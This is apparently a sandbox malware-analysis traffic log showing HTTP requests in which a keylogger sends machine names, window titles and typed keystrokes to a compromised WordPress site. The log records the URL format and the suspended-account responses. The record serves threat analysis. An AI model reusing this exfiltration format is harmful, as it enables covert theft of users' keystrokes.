ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:54%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Wed, 30 Nov 2016 09:54:03 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
22 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:54%20AM text/html post.php 302 Found HTML 345.0 B 03/08/76 09:10:49
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT0xOjU0JTIwQU0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
2b87fa92dc43f814bffbcf3fcccb0617c014efb8e9252f6106c08b63c7ec9038
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:54%20AM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Wed, 30 Nov 2016 09:54:18 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:54%20AM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
23 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:54%20AM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 03/08/76 17:21:52
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:54%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Wed, 30 Nov 2016 09:54:18 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
24 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:54%20AM text/html post.php 302 Found HTML 345.0 B 07/09/46 03:52:09
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT0yOjU0JTIwQU0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
ced94ad410a90c630db80893f198f895e3e69f08da7ea6e6d398f78a5c5dd73c
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:54%20AM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Fri, 02 Dec 2016 10:54:24 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:54%20AM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
25 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:54%20AM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 07/09/46 04:35:23
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
